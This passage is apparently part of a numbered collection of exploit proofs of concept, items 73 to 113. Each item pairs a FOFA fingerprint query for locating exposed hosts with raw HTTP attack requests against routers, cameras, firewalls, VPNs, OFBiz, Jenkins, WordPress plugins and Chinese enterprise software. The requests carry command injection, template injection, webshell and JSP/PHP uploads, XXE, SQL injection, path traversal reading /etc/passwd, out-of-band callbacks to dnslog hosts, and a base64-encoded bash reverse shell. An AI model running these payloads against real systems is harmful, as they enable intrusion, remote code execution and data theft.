S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Verification URL: http://x.x.x.x/userfiles/index.jsp

86. TOSEI (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen (网神) SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi (盈可视) HD smart lecture-capture system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
